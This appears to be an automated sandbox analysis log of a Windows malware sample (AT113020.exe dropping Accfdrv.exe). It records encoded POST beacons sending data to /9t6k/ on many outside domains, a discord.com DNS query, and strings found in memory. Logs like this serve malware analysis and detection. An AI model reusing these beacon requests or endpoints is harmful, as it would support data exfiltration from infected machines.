URflh=L6lFiW9KWnQWL9lbcB7QTYJ4lylxLQur7HtW8R97mai3gxF_WGyhmMe3Q-SaZSJ1pUD4W9AdVX6A2c7q~Cws17UCxCa_HoJyTQR7HyjgK0YsYCE-GV15ntuIrTHlefOU9fMG7rug6w5TMY(skMbXjYE0naQRa0XBrCDjsdqKW9b27r2HWT3MikvZqPfnRd0d5mGwyi9NzPtavIm6OBAqQVDVwWJz(BcjIczGuFp8PNEV~apatNVWq9pWLHX8P7xbwDu4VPV-Kuvkcd2iwPBb7Ipdu2i_CUWYZQ5JmwhWTOyX(1QZ5_GoReSZUevtRxygUbyIFOH1KdSRNGc06FEHPrJS3jOIvIp_mlIywhiLM3qpNzr5wzb6HHAC6FLO~uza5-XcmF9R9HuUKuELDQ).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.makingdoathome.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.makingdoathome.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.makingdoathome.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4d 59 68 34 39 6a 61 39 6f 38 63 76 6d 39 62 6d 4f 6d 4d 36 76 64 6e 56 50 4d 63 71 64 37 6c 35 31 72 76 6b 59 73 7a 49 33 57 6d 6d 53 7a 4f 50 28 41 4e 71 68 33 6b 36 6d 33 54 5a 4c 52 5a 41 5a 4b 51 37 52 4d 6a 6a 38 78 54 6d 37 79 70 51 28 69 74 49 78 63 58 37 46 56 76 59 38 38 66 6f 37 6d 36 6a 53 61 68 36 51 51 4c 64 33 4c 4a 5f 4f 73 75 32 44 56 56 44 46 37 6a 57 6a 30 6d 38 51 74 59 6b 36 44 6e 65 6e 35 6c 76 28 41 70 79 59 79 4e 64 69 74 56 68 42 61 48 61 70 6a 52 43 58 59 53 49 7e 45 44 61 4b 6b 57 75 37 35 4f 71 47 6e 50 35 28 4d 46 41 30 31 4e 36 50 69 44 52 61 30 48 72 48 6a 43 39 6f 33 4b 58 4f 65 7e 7a 6b 70 45 74 64 30 33 48 68 68 4b 6b 69 65 6a 4b 37 66 7e 61 4d 6e 33 55 77 6b 6b 4d 63 42 4c 65 55 59 48 43 55 53 6e 55 69 67 50 42 6b 57 4a 70 4c 76 52 50 35 6a 72 57 79 79 37 56 75 65 45 7a 45 6d 68 30 73 6a 39 62 44 32 73 79 6d 4e 58 55 37 4c 46 49 78 4f 30 33 37 62 73 7a 79 43 35 31 69 39 7e 72 79 77 30 57 69 4d 67 49 78 67 43 37 4a 61 76 70 66 4a 4e 7a 76 6a 77 5a 44 37 72 61 7a 4e 6f 4d 4e 46 64 4c 34 6c 65 34 51 78 66 30 43 4e 6a 52 32 62 36 76 6d 50 6f 49 38 5a 50 57 39 72 58 41 71 52 75 37 4b 73 4b 51 52 35 4a 6d 4a 6d 67 79 55 56 30 49 75 57 4a 72 55 78 51 76 36 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=MYh49ja9o8cvm9bmOmM6vdnVPMcqd7l51rvkYszI3WmmSzOP(ANqh3k6m3TZLRZAZKQ7RMjj8xTm7ypQ(itIxcX7FVvY88fo7m6jSah6QQLd3LJ_Osu2DVVDF7jWj0m8QtYk6Dnen5lv(ApyYyNditVhBaHapjRCXYSI~EDaKkWu75OqGnP5(MFA01N6PiDRa0HrHjC9o3KXOe~zkpEtd03HhhKkiejK7f~aMn3UwkkMcBLeUYHCUSnUigPBkWJpLvRP5jrWyy7VueEzEmh0sj9bD2symNXU7LFIxO037bszyC51i9~ryw0WiMgIxgC7JavpfJNzvjwZD7razNoMNFdL4le4Qxf0CNjR2b6vmPoI8ZPW9rXAqRu7KsKQR5JmJmgyUV0IuWJrUxQv6A).
Source: global traffic HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.rodgroup.netConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.rodgroup.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rodgroup.net/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 78 58 33 30 78 53 34 72 49 4c 54 5f 4d 79 35 71 74 4c 37 2d 6f 48 6e 71 39 32 4b 4d 59 69 57 75 52 59 55 6e 33 4f 5a 75 39 61 42 52 43 49 5a 36 37 5a 76 50 6d 32 54 62 42 6d 46 4b 49 2d 4d 31 79 71 66 52 5a 55 56 4f 4e 41 41 69 74 51 4a 71 6a 44 43 35 7a 4e 54 41 28 72 6e 43 70 76 64 62 63 79 78 58 6f 43 43 61 66 77 52 79 71 67 6d 50 6e 71 78 6a 35 6d 57 51 6c 58 37 74 54 50 69 62 71 77 35 32 4a 39 61 6f 58 33 31 34 6c 62 28 65 53 73 69 34 6a 45 49 2d 39 66 50 38 37 58 71 2d 57 6b 71 39 69 4d 6c 4b 46 78 53 30 53 72 32 57 7a 43 56 64 38 4d 54 65 53 32 66 31 45 72 66 44 37 57 59 71 34 4c 50 4d 57 70 66 63 47 59 44 73 36 6d 47 71 48 30 68 6f 64 37 71 44 41 4f 52 5a 52 47 65 76 6c 53 41 51 71 6d 39 30 4f 51 33 56 38 72 38 53 42 6a 52 56 51 4c 5a 57 54 65 45 46 6f 53 77 61 52 5a 38 52 64 50 42 33 43 6b 52 48 7a 6f 78 56 73 33 62 79 57 73 56 66 65 57 53 35 6d 79 55 46 76 6e 71 77 6d 49 69 31 77 63 6c 54 4e 4f 34 31 7a 4a 35 62 77 71 31 50 4e 30 52 56 70 5f 4d 59 59 4f 67 45 76 4a 79 52 43 6d 68 46 51 78 66 57 38 46 50 65 73 31 65 77 48 73 67 76 7e 6d 46 75 79 41 79 70 46 5f 79 64 71 48 31 47 39 2d 67 68 71 65 6d 37 63 74 57 44 39 76 67 67 4d 77 38 70 79 46 6c 52 55 6d 63 5f 68 31 45 75 78 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=xX30xS4rILT_My5qtL7-oHnq92KMYiWuRYUn3OZu9aBRCIZ67ZvPm2TbBmFKI-M1yqfRZUVONAAitQJqjDC5zNTA(rnCpvdbcyxXoCCafwRyqgmPnqxj5mWQlX7tTPibqw52J9aoX314lb(eSsi4jEI-9fP87Xq-Wkq9iMlKFxS0Sr2WzCVd8MTeS2f1ErfD7WYq4LPMWpfcGYDs6mGqH0hod7qDAORZRGevlSAQqm90OQ3V8r8SBjRVQLZWTeEFoSwaRZ8RdPB3CkRHzoxVs3byWsVfeWS5myUFvnqwmIi1wclTNO41zJ5bwq1PN0RVp_MYYOgEvJyRCmhFQxfW8FPes1ewHsgv~mFuyAypF_ydqH1G9-ghqem7ctWD9vggMw8pyFlRUmc_h1Euxw).
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_040FD37C InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 5_2_040FD37C
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: discord.com
Source: unknown HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.sportsbookmatcher.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sportsbookmatcher.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4c 36 6c 46 69 57 39 4b 57 6e 51 57 4c 39 6c 62 63 42 37 51 54 59 4a 34 6c 79 6c 78 4c 51 75 72 37 48 74 57 38 52 39 37 6d 61 69 33 67 78 46 5f 57 47 79 68 6d 4d 65 33 51 2d 53 61 5a 53 4a 31 70 55 44 34 57 39 41 64 56 58 36 41 32 63 37 71 7e 43 77 73 31 37 55 43 78 43 61 5f 48 6f 4a 79 54 51 52 37 48 79 6a 67 4b 30 59 73 59 43 45 2d 47 56 31 35 6e 74 75 49 72 54 48 6c 65 66 4f 55 39 66 4d 47 37 72 75 67 36 77 35 54 4d 59 28 73 6b 4d 62 58 6a 59 45 30 6e 61 51 52 61 30 58 42 72 43 44 6a 73 64 71 4b 57 39 62 32 37 72 32 48 57 54 33 4d 69 6b 76 5a 71 50 66 6e 52 64 30 64 35 6d 47 77 79 69 39 4e 7a 50 74 61 76 49 6d 36 4f 42 41 71 51 56 44 56 77 57 4a 7a 28 42 63 6a 49 63 7a 47 75 46 70 38 50 4e 45 56 7e 61 70 61 74 4e 56 57 71 39 70 57 4c 48 58 38 50 37 78 62 77 44 75 34 56 50 56 2d 4b 75 76 6b 63 64 32 69 77 50 42 62 37 49 70 64 75 32 69 5f 43 55 57 59 5a 51 35 4a 6d 77 68 57 54 4f 79 58 28 31 51 5a 35 5f 47 6f 52 65 53 5a 55 65 76 74 52 78 79 67 55 62 79 49 46 4f 48 31 4b 64 53 52 4e 47 63 30 36 46 45 48 50 72 4a 53 33 6a 4f 49 76 49 70 5f 6d 6c 49 79 77 68 69 4c 4d 33 71 70 4e 7a 72 35 77 7a 62 36 48 48 41 43 36 46 4c 4f 7e 75 7a 61 35 2d 58 63 6d 46 39 52 39 48 75 55 4b 75 45 4c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
URflh=L6lFiW9KWnQWL9lbcB7QTYJ4lylxLQur7HtW8R97mai3gxF_WGyhmMe3Q-SaZSJ1pUD4W9AdVX6A2c7q~Cws17UCxCa_HoJyTQR7HyjgK0YsYCE-GV15ntuIrTHlefOU9fMG7rug6w5TMY(skMbXjYE0naQRa0XBrCDjsdqKW9b27r2HWT3MikvZqPfnRd0d5mGwyi9NzPtavIm6OBAqQVDVwWJz(BcjIczGuFp8PNEV~apatNVWq9pWLHX8P7xbwDu4VPV-Kuvkcd2iwPBb7Ipdu2i_CUWYZQ5JmwhWTOyX(1QZ5_GoReSZUevtRxygUbyIFOH1KdSRNGc06FEHPrJS3jOIvIp_mlIywhiLM3qpNzr5wzb6HHAC6FLO~uza5-XcmF9R9HuUKuELDQ).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Dec 2020 09:04:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeSet-Cookie: __cfduid=dd71c2ffeca371060d60ef6a8a2fa51701606986259; expires=Sat, 02-Jan-21 09:04:19 GMT; path=/; domain=.sportsbookmatcher.com; HttpOnly; SameSite=LaxVary: Accept-EncodingCF-Cache-Status: DYNAMICcf-request-id: 06c97175430000f9e29ba5c000000001Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NBSJEqNn0gbaJ38J2hY3l3dlvS1aDl9NUyo4Pg2Eew9SWwTB4dpixC%2BqUkf%2BAdzibOjN5SdHuKhvsj%2BryZQJbGnQKoCK8agM%2BtYj7Dg9xED8qhQOt362mEVg"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 5fbc1e9b9ab3f9e2-PRGData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 74 36 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9t6k/ was not found on this server.</p></body></html>
Source: AT113020.exe, 00000001.00000003.237565078.00000000007D6000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.co
Source: Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: AT113020.exe, 00000001.00000003.237565078.00000000007D6000.00000004.00000001.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOECCCertificationAuthority.crl0r
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl0
Source: Accfdrv.exe, 00000005.00000003.272990264.0000000000897000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca7
Source: Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca_nu
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp String found in binary or memory: http://crt.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crt0%
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27586/searchbtn.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/BG_2.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/Left.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/Right.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca4.com0
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.Rodgroup.net
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp141
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp1M
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpD?
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp&P
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpTP(_t
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/9t6k/?URflh=
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/All_Inclusive_Vacation_Packages.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIew
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/Credit_Card_Application.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbd
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/Free_Credit_Report.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/Online_classifieds.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/__media__/design/underconstructionnotice.php?d=rodgroup.net
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/__media__/js/trademark.php?d=rodgroup.net&type=ns
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/display.cfm
